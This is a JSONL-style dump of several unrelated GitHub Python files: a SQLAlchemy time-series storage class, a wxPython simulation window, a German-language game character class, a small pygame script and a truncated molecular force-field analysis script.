semaphoreSeriesDescription.dataDatum)\n .where(self.outputs.c.timeGenerated >= fromGeneratedTime)\n .where(self.outputs.c.timeGenerated <= toGeneratedTime)\n )\n tupleishResult = self.__dbSelection(statement).fetchall()\n outputResult = self.__splice_output(tupleishResult)\n series.data = outputResult\n return series\n \n def find_external_location_code(self, sourceCode: str, location: str, priorityOrder: int = 0) -> str:\n \"\"\"Returns a data source location code based off of passed parameters\n :param sourceCode: str - the data source code (noaaT&C)\n :param location: str - the local location name \n :param priorityOrder: int - priority of which locations to go to if one is unavailable \n \"\"\"\n statement = (select(self.dataLocation_dataSource_mapping.c.dataSourceLocationCode)\n .where(self.dataLocation_dataSource_mapping.c.dataSourceCode == sourceCode)\n .where(self.dataLocation_dataSource_mapping.c.dataLocationCode == location)\n .where(self.dataLocation_dataSource_mapping.c.priorityOrder == priorityOrder)\n )\n dataSourceLocationCode = self.__dbSelection(statement).fetchall()[0]\n return dataSourceLocationCode[0]\n\n def find_lat_lon_coordinates(self, locationCode: str) -> tuple:\n \"\"\"Returns lat and lon tuple\n :param sourceCode: str - the data source code (noaaT&C)\n :param location: str - the local location name \n :param priorityOrder: int - priority of which locations to go to if one is unavailable \n \"\"\"\n statement = (select(self.ref_dataLocation.c.latitude, self.ref_dataLocation.c.longitude)\n .where(self.ref_dataLocation.c.code == locationCode)\n )\n latLon = self.__dbSelection(statement).first()\n return (latLon[0], latLon[1])\n \n\n def insert_input(self, series: Series) -> Series:\n \"\"\"This method inserts actual/predictions into the input table\n :param series: Series - A series object with a time description, series description, and input data\n :return Series - A series object that contains the actually inserted data\n \"\"\"\n\n if(type(series.description).__name__ != 'SeriesDescription'): raise ValueError('Description should be type SeriesDescription')\n\n # Construct DB row to insert\n now = datetime.now()\n insertionRows = []\n for input in series.data:\n insertionValueRow = {\"isActual\": None, \"generatedTime\": None, \"isActual\": None,\"acquiredTime\": None, \"verifiedTime\": None, \"dataValue\": None, \"dataUnit\": None, \"dataSource\": None, \"dataLocation\": None, \"dataDatum\": None, \"latitude\": None, \"longitude\": None}\n insertionValueRow[\"generatedTime\"] = input.timeGenerated\n insertionValueRow[\"acquiredTime\"] = now\n insertionValueRow[\"verifiedTime\"] = input.timeVerified\n insertionValueRow[\"dataValue\"] = input.dataValue\n insertionValueRow[\"isActual\"] = False if series.description.dataSeries[0] == 'p' else True\n insertionValueRow[\"dataUnit\"] = input.dataUnit\n insertionValueRow[\"dataSource\"] = series.description.dataSource\n insertionValueRow[\"dataLocation\"] = series.description.dataLocation\n insertionValueRow[\"dataSeries\"] = series.description.dataSeries\n insertionValueRow[\"dataDatum\"] = 'None' if series.description.dataDatum == None else series.description.dataDatum\n insertionValueRow[\"latitude\"] = input.latitude\n insertionValueRow[\"longitude\"] = input.longitude\n insertionRows.append(insertionValueRow)\n\n with self.__get_engine().connect() as conn:\n cursor = conn.execute(insert(self.inputs)\n .returning(self.inputs)\n .values(insertionRows)\n .prefix_with('OR IGNORE')\n )\n result = cursor.fetchall()\n conn.commit()\n\n resultSeries = Series(series.description, True, series.timeDescription)\n resultSeries.data = self.__splice_input(result) #Turn tuple objects into actual objects\n return resultSeries\n \n\n\n def insert_output(self, series: Series) -> Series:\n \"\"\"This method inserts actual/predictions into the output table\n :param series: Series - A series object with a time description, semaphore series description, and outputdata\n :return Series - A series object that contains the actually inserted data\n \"\"\"\n\n if(type(series.description).__name__ != 'SemaphoreSeriesDescription'): raise ValueError('Description should be type SemaphoreSeriesDescription')\n\n insertionValueRows = []\n for output in series.data:\n insertionValueRow = {\"timeGenerated\": None, \"leadTime\": None, \"modelName\": None, \"dataValue\": None, \"dataUnit\": None, \"dataLocation\": None, \"dataSeries\": None, \"dataDatum\": None}\n insertionValueRow[\"timeGenerated\"] = output.timeGenerated\n insertionValueRow[\"leadTime\"] = output.leadTime\n insertionValueRow[\"modelName\"] = series.description.modelName\n insertionValueRow[\"modelVersion\"] = series.description.modelVersion\n insertionValueRow[\"dataValue\"] = output.dataValue\n insertionValueRow[\"dataUnit\"] = output.dataUnit\n insertionValueRow[\"dataLocation\"] = series.description.dataLocation\n insertionValueRow[\"dataSeries\"] = series.description.dataSeries\n insertionValueRow[\"dataDatum\"] = series.description.dataDatum\n \n insertionValueRows.append(insertionValueRow)\n\n with self.__get_engine().connect() as conn:\n cursor = conn.execute(insert(self.outputs)\n .returning(self.outputs)\n .values(insertionValueRows)\n .prefix_with('OR IGNORE')\n )\n result = cursor.fetchall()\n conn.commit()\n\n resultSeries = Series(series.description, True, series.timeDescription)\n resultSeries.data = self.__splice_output(result) #Turn tuple objects into actual objects\n return resultSeries\n \n\n def create_DB(self) -> None:\n \"\"\"Creates the database with the tethered engine.\n Requires the engine to be created before it will create the DB.\n See: DBManager.create_engine()\n \"\"\"\n\n self._metadata.create_all(self.__get_engine())\n \n\n def drop_DB(self) -> None:\n \"\"\"Drops the database with the tethered engine.\n Requires the engine to be created before it will drop the DB.\n See: DBManager.create_engine()\n \"\"\"\n\n self._metadata.drop_all(self.__get_engine())\n\n #############################################################################################\n ################################################################################## DB Managment Methods\n #############################################################################################\n\n def __create_engine(self, parmaString: str, echo: bool ) -> None: #\"sqlite+pysqlite:///:memory:\"\n \"\"\"Creates an engine object and tethers it to this interface class as an atribute\n\n Parameters:\n permaString: str - An sqlalchemy string that defines the location the engine should point to: (e.g. \"sqlite+pysqlite:///:memory:\")\n echo: str - Weather or not the engine should echo to stdout\n \"\"\"\n self._engine = sqlalchemy_create_engine(parmaString, echo=echo)\n\n \n def __get_engine(self) -> Engine:\n \"\"\"Fetches the engine attribute. Requires the engine attribute to be created.\n See: DBManager.create_engine()\n \"\"\"\n\n if not hasattr(self, '_engine') or self._engine == None:\n raise Exception(\"An engine was requested from DBManager, but no engine has been created. See DBManager.create_engine()\")\n else:\n return self._engine\n\n def __create_schema(self) -> None:\n \"\"\"Builds the db schema in the metadata.\n \"\"\"\n\n self._metadata = MetaData()\n \n #this table stores the actual data values as retrieved or received \n self.inputs = Table(\n \"inputs\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n\n Column(\"generatedTime\", DateTime, nullable=True),\n Column(\"acquiredTime\", DateTime, nullable=False),\n Column(\"verifiedTime\", DateTime, nullable=False), \n\n Column(\"dataValue\", String(10), nullable=False), \n\n Column(\"isActual\", Boolean, nullable=False),\n\n Column(\"dataUnit\", String(10), ForeignKey(\"ref_dataUnit.code\"), nullable=False), \n \n Column(\"dataSource\", String(10), ForeignKey(\"ref_dataSource.code\"), nullable=False),\n Column(\"dataLocation\", String(25), ForeignKey(\"ref_dataLocation.code\"), nullable=False), \n Column(\"dataSeries\", String(10), ForeignKey(\"ref_dataSeries.code\"), nullable=False), \n Column(\"dataDatum\", String(10), ForeignKey(\"ref_dataDatum.code\"), nullable=False),\n \n Column(\"latitude\", String(16), nullable=True),\n Column(\"longitude\", String(16), nullable=True),\n\n UniqueConstraint(\"isActual\", \"generatedTime\", \"verifiedTime\", \"dataUnit\", \"dataSource\", \"dataLocation\", \"dataSeries\", \"dataDatum\", \"latitude\", \"longitude\"),\n )\n\n \n self.outputs = Table(\n \"outputs\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"timeGenerated\", DateTime, nullable=False),\n\n Column(\"leadTime\", Interval, nullable=False),\n\n Column(\"modelName\", String(25), nullable=False), \n Column(\"modelVersion\", String(10), nullable=False),\n Column(\"dataValue\", String(20), nullable=False), \n Column(\"dataUnit\", String(10), ForeignKey(\"ref_dataUnit.code\"), nullable=False), \n Column(\"dataLocation\", String(25), ForeignKey(\"ref_dataLocation.code\"), nullable=False), \n Column(\"dataSeries\", String(10), ForeignKey(\"ref_dataSeries.code\"), nullable=False), \n Column(\"dataDatum\", String(10), ForeignKey(\"ref_dataDatum.code\"), nullable=True),\n\n UniqueConstraint(\"timeGenerated\", \"leadTime\", \"modelName\", \"modelVersion\", \"dataLocation\", \"dataSeries\", \"dataDatum\"),\n )\n\n #This table maps CBI location codes to location codes used by datasorces\n self.dataLocation_dataSource_mapping = Table(\n \"dataLocation_dataSource_mapping\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"dataLocationCode\", String(25), ForeignKey(\"ref_dataLocation.code\"),nullable=False), \n Column(\"dataSourceCode\", String(10), ForeignKey(\"ref_dataSource.code\"), nullable=False), \n Column(\"dataSourceLocationCode\", String(255), nullable=False), \n Column(\"priorityOrder\", Integer, nullable=False), \n\n UniqueConstraint(\"dataLocationCode\", \"dataSourceCode\", \"dataSourceLocationCode\", \"priorityOrder\"),\n )\n\n\n #The rest of these tables are reference tables for values stored in the tables above. They all contain\n # ID - Automated id\n # code - that mapped code\n # display name - a non compressed pretty name\n # notes - more information about that item\n self.ref_dataLocation = Table(\n \"ref_dataLocation\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(25), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n Column(\"latitude\", String(16), nullable=False),\n Column(\"longitude\", String(16), nullable=False),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n self.ref_dataSource = Table(\n \"ref_dataSource\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(10), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n self.ref_dataSeries = Table(\n \"ref_dataSeries\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(10), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n self.ref_dataUnit = Table(\n \"ref_dataUnit\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(10), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n self.ref_dataDatum = Table(\n \"ref_dataDatum\",\n self._metadata,\n\n Column(\"id\", Integer, autoincrement=True, primary_key=True),\n \n Column(\"code\", String(10), nullable=False),\n Column(\"displayName\", String(30), nullable=False),\n Column(\"notes\", String(250), nullable=True),\n\n UniqueConstraint(\"code\", \"displayName\"),\n )\n\n #############################################################################################\n ################################################################################## DB Interaction private methods\n #############################################################################################\n\n def __dbSelection(self, stmt: Select) -> CursorResult:\n \"\"\"Runs a selection statement \n Parameters:\n stmt: SQLAlchemy Select - The statement to run\n Returns:\n SQLAlchemy CursorResult\n \"\"\"\n\n with self.__get_engine().connect() as conn:\n result = conn.execute(stmt)\n\n return result\n\n def __splice_input(self, results: list[tuple]) -> list[Input]:\n \"\"\"An Input is a data value of some environment variable that can be linked to a date time.\n :param list[tupleish] -a list of selections from the table formatted in tupleish\n \"\"\"\n valueIndex = 4\n unitIndex = 6\n generatedTimeIndex = 1\n verifiedTimeIndex = 3\n latitudeIndex = 11\n longitudeIndex = 12\n\n dataPoints = []\n for row in results:\n dataPoints.append(Input(\n row[valueIndex],\n row[unitIndex],\n row[verifiedTimeIndex],\n row[generatedTimeIndex],\n row[longitudeIndex],\n row[latitudeIndex]\n ))\n\n return dataPoints\n\n def __splice_output(self, results: list[tuple]) -> list[Output]:\n \"\"\"Splices up a list of DB results, pulling out only the data that changes per point,\n and places them in a Prediction object.\n param: list[tupleish] - a list of selections from the table formatted in tupleish\n \"\"\"\n valueIndex = 5\n unitIndex = 6\n timeGeneratedIndex = 1\n leadTimeIndex = 2\n \n dataPoints = []\n for row in results:\n dataPoints.append(Output(\n row[valueIndex],\n row[unitIndex],\n row[timeGeneratedIndex],\n row[leadTimeIndex]\n ))\n\n return dataPoints\n\n def insert_lat_lon_test(self, code: str, displayName: str, notes: str, latitude: str, longitude: str):\n \"\"\"This method inserts lat and lon information\n \"\"\"\n #Construct DB row to insert\n insertionValueRow = {\"code\": code, \"displayName\": displayName, \"notes\": notes, \"latitude\": latitude, \"longitude\": longitude}\n \n with self.__get_engine().connect() as conn:\n conn.execute(insert(self.ref_dataLocation)\n .values(insertionValueRow))\n conn.commit()\n\n def insert_external_location_code(self, dataLocationCode: str, dataSourceCode: str, dataSourceLocationCode: str, priorityOrder: int):\n \"\"\"This method inserts external location code information\n \"\"\"\n #Construct DB row to insert\n insertionValueRow = {\"dataLocationCode\": dataLocationCode, \"dataSourceCode\": dataSourceCode, \"dataSourceLocationCode\": dataSourceLocationCode, \"priorityOrder\": priorityOrder}\n \n with self.__get_engine().connect() as conn:\n conn.execute(insert(self.dataLocation_dataSource_mapping)\n .values(insertionValueRow))\n conn.commit()","repo_name":"conrad-blucher-institute/semaphore","sub_path":"src/SeriesStorage/SeriesStorage/SQLAlchemyORM.py","file_name":"SQLAlchemyORM.py","file_ext":"py","file_size_in_byte":22520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6586417681","text":"'''用于创建一个窗口界面'''\nimport random\nimport wx\nimport _thread\nfrom threading import Timer\n\n\nimport var\nimport MyClass\n\nclass MyLabel(wx.StaticText):\n '''标签框'''\n def __init__(self,label='000'):\n self.SetLabel(label)\n self.SetBackgroundColour('#FFFFFF')\n \n\n\n\nclass Mywin(wx.Frame):\n '''创建一个窗口类.\\n'''\n def __init__(self):\n ''' 构造函数\\n'''\n super(Mywin, self).__init__(None, title='SIM', size=(1000, 800))\n ################################################################\n self.scroller = wx.ScrolledWindow(self, -1)\n self.scroller.SetBackgroundColour('#666666')\n self.scroller.SetScrollbars( 1, 1, 1000, 1000)\n self.panel = wx.Panel(self.scroller)\n self.grid0 = wx.BoxSizer(wx.VERTICAL) # 最基本的布局\n self.表=[]\n self.tick=0\n self.isRun = True\n ##############################################################\n self. 创建单位列表()\n ##################################################################\n # 窗口添加内容\n self.添加菜单栏()\n ##############################################################\n self.grid_抬头 = wx.BoxSizer(wx.HORIZONTAL)\n self.grid0.Add(self.grid_抬头, 1, flag = wx.ALL|wx.EXPAND,border = 5)\n\n self.txt1 = self.__创建label('Tick:',宽度=150,字体=25)\n self.txt1.SetWindowStyleFlag(style=wx.ALIGN_LEFT)\n self.grid_抬头.Add(self.txt1, 3, flag=wx.EXPAND)\n self.grid_抬头.AddStretchSpacer(1)\n self.bt1 = wx.Button(self.panel, label=\"刷新\")\n self.grid_抬头.Add(self.bt1,5, flag=wx.EXPAND)\n self.bt1.Bind(wx.EVT_BUTTON, self.刷新)\n self.grid_抬头.AddStretchSpacer(1) \n self.bt2 = wx.Button(self.panel, label=\"刷新2\")\n self.grid_抬头.Add(self.bt2,5, flag=wx.EXPAND)\n self.bt2.Bind(wx.EVT_BUTTON, self.刷新2)\n\n ###############################################################\n self.grid_信息表 = wx.GridBagSizer(2, 2) # 参数是子控件之间上下和左右距离\n self.grid0.Add(self.grid_信息表, 10, flag = wx.ALL|wx.EXPAND,border = 5)\n self.添加表头()\n self.添加信息表(self.grid_信息表,self.panel )\n #self.grid0.AddStretchSpacer(1) \n ###########################################################\n\n ############################################\n self.添加资源栏(self.grid0)\n ###########################################################\n self.panel.SetSizerAndFit(self.grid0)\n self.Center()\n self.Show()\n\n def 创建单位列表(self):\n for i in var.产品列表:\n var.单位列表.append(MyClass.factory(self.panel,i))\n\n def 添加菜单栏(self):\n fileMenu = wx.Menu('菜单标题') #顶级菜单\n newitem = wx.MenuItem(fileMenu,wx.ID_NEW, text = \"New\",helpString='= wx.ITEM_NORMAL')\n #newitem.SetBitmap(wx.Bitmap(\"捕捉.png\"))\n fileMenu.Append(newitem)\n #fileMenu.AppendItem(quit)\n\n self.Menu2 = wx.Menu('菜单标题')\n self.Menu3 = wx.Menu()\n menubar = wx.MenuBar()\n menubar.Append(fileMenu, '&File')\n menubar.Append(self.Menu2, '&File2')\n menubar.Append(self.Menu3, 'menu3')\n\n self.SetMenuBar(menubar) \n self.Bind(wx.EVT_MENU, self.菜单栏事件) \n self.t = Timer(1.0, self.display)\n def 添加表头(self):\n for i in var.信息表[0] :\n temp =self.__创建label(i,150)\n self.grid_信息表.Add(temp, pos = (var.信息表[0].index(i),0), flag=wx.EXPAND )\n\n def 添加信息表(self, grid, panel):\n # 添加表格\n for i in var.单位列表:\n self.表.append([])\n temp= None\n temp = i.get信息()\n for j in range(len(temp)) :\n _l = self.__创建label(str(temp[j]),100 )\n self.表[-1].append(_l )\n _pos=( j, var.单位列表.index(i)+1)\n grid.Add(_l, pos = _pos, flag=wx.EXPAND )\n\n #grid.Add(_l, pos = _pos, flag=wx.EXPAND )\n def 刷新(self,e):\n # print('--'*20)\n print('刷新1','--'*20)\n for i in var.单位列表:\n i.refresh()\n for i in var.单位列表:\n temp= None\n temp = i.get信息()\n for j in range(len(temp)) :\n self.表[var.单位列表.index(i)][j].SetLabel(str(temp[j]))\n self.资金总和()\n\n def 刷新2(self,e):\n #print('--'*20)\n # print('--'*20)\n for i in var.单位列表:\n i.sub结算()\n for i in var.单位列表:\n temp= None\n temp = i.get信息()\n for j in range(len(temp)) :\n self.表[var.单位列表.index(i)][j].SetLabel(str(temp[j]))\n self.资金总和()\n \n def 菜单栏事件(self,event):\n id = event.GetId()\n if id == wx.ID_NEW: \n self.Menu2.SetTitle(str(random.random())) #SetLabel(random.random())\n if id == 1099: \n self.MenuItem1.SetTitle(str(random.random())) \n #s=event.GetValue()\n print(event.GetEventObject().Title)\n\n def 添加资源栏(self, grid):\n # 添加表格\n for i in var.单位列表:\n grid.Add( i.grid, flag=wx.ALL|wx.EXPAND)\n i.addCtrls(self.panel)\n self.grid0.AddStretchSpacer(1)\n\n def __创建label(self,txt='txt',宽度=50,字体=20,颜色='#FFFFFF'):\n temp = wx.StaticText(self.panel, label=txt,size=(宽度,-1),style=wx.ALIGN_CENTRE)\n temp.SetBackgroundColour(颜色)\n font = wx.Font(字体,wx.FONTFAMILY_DEFAULT,wx.FONTSTYLE_NORMAL,wx.FONTWEIGHT_NORMAL) \n temp.SetFont(font) \n return temp\n\n def display(self, e=0):\n self.tick +=1\n self.txt1.SetLabel('Tick:'+'{:>3d}'.format(self.tick))\n print('Tick:',self.tick)\n self.刷新('')\n '''try:\n #self.刷新2('')\n self.刷新('')\n except:\n print(\"Error: 无法启动线程\")'''\n if self.isRun :\n self.t = Timer(2.0, self.display)\n self.t.start()\n def 预算(self):\n for i in var.单位列表:\n i.sub预算()\n print('buy',var.buy)\n print('out',var.out)\n\n def 资金总和(self):\n rv = 0\n temp = ''\n for i in var.单位列表:\n rv += i. get净资产()\n if rv < 10000 :\n temp = '{:>4d}'.format(rv)\n elif rv < 10^6:\n rv1 = rv // 10000\n rv2 = rv % 10000\n temp = '{:>4d}'.format(rv1)+'_'+'{:0>4d}'.format(rv2)\n else:\n temp = str(rv)\n try :\n self.SetTitle(temp)\n except:\n print('SetTitle')\n\ndef 启动窗口():\n print('程序开始 ...')\n app = wx.App()\n #app.locale = wx.Locale(wx.LANGUAGE_CHINESE_SIMPLIFIED)\n win = Mywin()\n win.t.start()\n win.bt1.Enable(False)\n app.MainLoop()\n\n\n启动窗口()\n\n\n\n\n\n\n","repo_name":"bmzk/sim-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14233619684","text":"from .name_generator import NameGenerator\nfrom . import abilities\nfrom . import animalsubtypes\nfrom . import skills\nfrom . import animaltypes\nimport math\n\n\nclass Character:\n abilities = abilities.CharacterAbilities()\n\n def __init__(self, name=None, animaltype=None, animalsubtype=None, level=1, build_points=10, skills=[], status=[], temp_status=[], erfahrung=0, stealth=False, savers=False):\n self.name = name\n self.animaltype = animaltype\n self.animalsubtype = animalsubtype\n self.level = level\n self.build_points = build_points\n self.skills = skills\n self.update_Skills(self.skills)\n self.status = status\n self.temp_status = temp_status\n self.erfahrung = erfahrung\n self.stealth = stealth\n self.savers = savers\n\n def exp_needed_for_Level_Up(self):\n constant = 40\n exp_needed = int(round((constant * self.level) * math.sqrt(constant)))\n return exp_needed\n\n def level_up_check(self):\n if self.get_experience() >= self.exp_needed_for_Level_Up():\n self.LevelUp()\n\n def get_experience(self):\n return self.erfahrung\n\n def gain_experience(self, amount):\n self.erfahrung += amount\n self.level_up_check()\n\n def get_status_max(self, input_string):\n # Gesundheit\n if input_string == 'health':\n return self.status[0]\n # Ausdauer\n elif input_string == 'endu':\n return self.status[1]\n # Magie\n elif input_string == \"magic\":\n return self.status[2]\n\n def set_stealth_mode(self, Bool):\n self.stealth = Bool\n\n def get_stealth_mode(self):\n return self.stealth\n\n def set_savers_mode(self, Bool):\n self.savers = Bool\n\n def get_savers_mode(self):\n return self.savers\n\n def get_status_temp(self, input_string):\n if input_string == 'health':\n return self.temp_status[0]\n elif input_string == 'endu':\n return self.temp_status[1]\n elif input_string == \"magic\":\n return self.temp_status[2]\n\n def change_status_temp(self, input_string, Vorzeichen):\n if input_string == 'health':\n if Vorzeichen == '+':\n if self.temp_status[0] < self.status[0]:\n self.temp_status[0] += 1\n if Vorzeichen == '-':\n if self.temp_status[0] > 0:\n self.temp_status[0] -= 1\n elif input_string == 'endu':\n if Vorzeichen == '+':\n if self.temp_status[1] < self.status[1]:\n self.temp_status[1] += 1\n if Vorzeichen == '-':\n if self.temp_status[1] > 0:\n self.temp_status[1] -= 1\n elif input_string == \"magic\":\n if Vorzeichen == '+':\n if self.temp_status[2] < self.status[2]:\n self.temp_status[2] += 1\n if Vorzeichen == '-':\n if self.temp_status[2] > 0:\n self.temp_status[2] -= 1\n\n def set_status_initial(self):\n endurancemodifier=(self.get_resi()+self.get_dext())\n magicmodifier=(self.get_int())\n if isinstance(self.animaltype, animaltypes.clsBaer):\n self.status = [20, 40+endurancemodifier, 5+magicmodifier]\n if self.has_Skill(skills.EnduranceCharacterSkill):\n self.status[1] *= 2\n elif isinstance(self.animaltype, animaltypes.clsRobbe):\n self.status = [10, 35+endurancemodifier, 15+magicmodifier]\n if self.has_Skill(skills.EnduranceCharacterSkill):\n self.status[1] *= 20\n self.temp_status = self.status[:]\n\n def get_str(self):\n return self.abilities.__getattribute__('strength').value\n\n def get_dext(self):\n return self.abilities.__getattribute__('dexterity').value\n\n def get_resi(self):\n return self.abilities.__getattribute__('resistance').value\n\n def get_int(self):\n return self.abilities.__getattribute__('intelligence').value\n\n def get_Name(self):\n return self.name\n\n def set_Name(self, name):\n self.name = str(name)\n\n def get_Skills(self):\n return self.skills\n\n def set_Skill(self, input_skill):\n self.skills.append(input_skill)\n\n def get_Level(self):\n level = str(self.level)\n return level\n\n def set_Type(self, type):\n self.animaltype = type()\n\n def get_Type(self):\n return self.animaltype\n\n def set_Subtype(self, animalsubtype):\n self.animalsubtype = animalsubtype()\n self.update_applicable_Skills()\n self.update_Skills(self.skills)\n\n def get_Subtype(self):\n return self.animalsubtype\n\n def get_Build_Points(self):\n return self.build_points\n\n def gain_Build_Points(self, points):\n self.build_points += points\n\n def lower_Build_Points(self, points):\n self.build_points -= points\n\n def spend_Build_Points(self, input_ability):\n for ability in abilities.ALL:\n if str(ability.id) == input_ability:\n getattr(self.abilities, ability.id).value += 1\n self.update_applicable_Skills()\n self.update_Skills(self.skills)\n break\n\n def lose_Build_Points(self, input_ability):\n for ability in abilities.ALL:\n if str(ability.id) == input_ability:\n getattr(self.abilities, ability.id).value -= 1\n self.update_applicable_Skills()\n self.update_Skills(self.skills)\n break\n\n def Build_Point_Value(self, input_ability):\n for ability in abilities.ALL:\n if str(ability.id) == input_ability:\n return getattr(self.abilities, ability.id).value\n\n def LevelUp(self):\n num_redo=self.get_status_max(\"health\")-self.get_status_temp(\"health\")\n for i in range(num_redo):\n self.change_status_temp(\"health\", \"+\")\n num_redo = self.get_status_max(\"endu\") - self.get_status_temp(\"endu\")\n for i in range(num_redo):\n self.change_status_temp(\"endu\", \"+\")\n for i in range(num_redo):\n self.change_status_temp(\"magic\", \"+\")\n\n self.build_points+=1\n if self.level>6:\n self.build_points+=1\n self.level = self.level+1\n\n def randomize_Name(self):\n name = NameGenerator.generate_name(2, 5)\n self.set_Name(name)\n\n def update_applicable_Skills(self):\n self.skills = []\n for skill in skills.ALL:\n continues = True\n for subtype in skill.applicable_subtype:\n if (isinstance(self.animalsubtype, subtype)):\n continues = False\n break\n if continues:\n continue\n continues = False\n\n for required_ability, min_value in skill.required_abilities.items():\n if getattr(self.abilities, required_ability.id).value < min_value:\n continues = True\n break\n if continues:\n continue\n self.skills.append(skill)\n\n def update_Skills(self, Liste):\n self.skills = Liste[:]\n\n def has_Skill(self, input_skill):\n for skill in self.skills:\n if skill == input_skill:\n return True\n return False\n\n# für den Charakterbogen\n def __str__(self):\n content = [\n '## Charakter Bogen',\n '',\n ' - Name: ' + self.name,\n ' - Tierart: ' + str(self.animaltype),\n ' - Farbe: ' + str(self.animalsubtype),\n '',\n '## Statuswerte',\n ''\n ]\n for ability in abilities.ALL:\n content.append(' - ' + ability.name + ': ' +\n str(getattr(self.abilities, ability.id).value))\n content.extend([\n '',\n '## Fähigkeiten',\n ''\n ])\n if not self.skills:\n content.append('Keine Fähigkeiten verfügbar.')\n else:\n for skill in self.skills:\n content.append(' - ' + skill.name)\n return '\\n'.join(content)\n","repo_name":"Vulnona/Little-Seal-and-Bear","sub_path":"character/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25346302971","text":"import pygame\n\nWIDTH, HEIGHT = 900, 500\nFPS = 60\n\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Game')\n\n\n# MAIN\ndef main():\n clock = pygame.time.Clock()\n run = True\n x = 10\n\n while run:\n clock.tick(FPS)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n rects = pygame.Rect(0,0,x,HEIGHT)\n x += 10\n\n # Draw\n def draw_window():\n WIN.fill('light blue')\n pygame.draw.rect(WIN, 'red', rects)\n \n pygame.display.update()\n\n draw_window()\n \n\n\nif __name__ == '__main__':\n main()\n\npygame.quit()","repo_name":"SWESH1K/Space-Mania","sub_path":"timepass.py","file_name":"timepass.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40659579747","text":"from collections import defaultdict\nimport numpy as np\nfrom simtk import unit\n\nfrom simtk import unit\n\ntemperature = 298.15 * unit.kelvin # conditions from FreeSolv\npressure = 1.01325 * unit.bar # conditions from FreeSolv\nfrom openmmtools.constants import kB\n\nkT = kB * temperature\nfrom openeye import oechem\n\n# 0. Load the systems and coordinates precomputed for FreeSolv\nprint('loading pickles')\nfrom pickle import load\nwith open('pickles/some_generated_systems.pkl', 'rb') as f:\n generated_systems = load(f) # list of (mol, topology, system, positions) tuples\nprint(len(generated_systems))\n\n# TODO: must regenerate these, since the default GBSA parameters I used were very wrong probably...\nwith open('pickles/some_generated_samples.pkl', 'rb') as f:\n generated_samples = load(f) # list of { \"xyz_vacuum\": xyz_vacuum, \"xyz_implicit\": xyz_implicit } dicts\n\ndef load_freesolv(path=\"../../FreeSolv-0.51/database.txt\"):\n \"\"\"Loads the freesolv database as a list of lists of strings\"\"\"\n with open(path, 'r') as f:\n freesolv = f.read()\n\n legend = freesolv.split('\\n')[2].split('; ')\n db = []\n for entry in freesolv.split('\\n')[3:-1]:\n db.append(entry.split('; '))\n return legend, db\n\nlegend, db = load_freesolv()\nexpt_measurements = [(float(entry[3]), float(entry[4])) for entry in db]\n\n# 1. Construct models, one for each forcefield\nfrom openforcefield.typing.engines.smirnoff import ForceField\n\n\ndef get_parameter_ids(ff, mol):\n \"\"\"Get a list with the SMIRNOFF parameter id of each atom in the input OEMol object\"\"\"\n\n # pass in a length-1 list, receive a length-1 list, assign its item to \"all_labels\"\n all_labels = ff.labelMolecules([mol])[0]\n\n # \"all_labels\" is a dict, with keys:\n # ['HarmonicBondGenerator', 'HarmonicAngleGenerator', 'PeriodicTorsionGenerator', 'NonbondedGenerator']\n nonbonded_labels = all_labels['NonbondedGenerator']\n\n # \"nonbonded_labels\" is a list of 3-tuples,\n # where the 2nd element in each tuple is a string like 'n3' or 'n15' parameter id assigned\n parameter_ids = [label[1] for label in nonbonded_labels]\n return parameter_ids\n\ndef parameter_id_to_index(parameter_id):\n \"\"\"Converts a SMIRNOFF parameter id string (like 'n3' or 'n15') to an 0-start integer index\"\"\"\n\n assert(parameter_id[0] == 'n') # make sure this is a nonbonded parameter...\n\n return int(parameter_id[1:]) - 1\n\nfrom glob import glob\nforcefield_paths = glob('forcefields/*.ffxml')\n# make sure we only keep the modified forcefields\nforcefield_paths = [path for path in forcefield_paths if '_' in path]\n\nactive_gbsa_param_sets = defaultdict(set)\n\nprint('applying each forcefield to each molecule')\nfrom tqdm import tqdm\nfor forcefield in tqdm(forcefield_paths[:5]):\n\n truncation = int(forcefield.split('.')[0].split('_')[-1])\n\n ff = ForceField(forcefield)\n\n for i in range(len(generated_systems)):\n mol = generated_systems[i][0]\n active_gbsa_param_sets[truncation].update(get_parameter_ids(ff, mol))\n\nfor key in sorted(active_gbsa_param_sets.keys()):\n print(key, len(active_gbsa_param_sets[key]))\n\n\n# let's select a single model, the one with just two atom types, so we can visualize them\n\nn_types = 10\ngbsa_forcefield = ForceField([path for path in forcefield_paths if '_{}.ffxml'.format(n_types) in 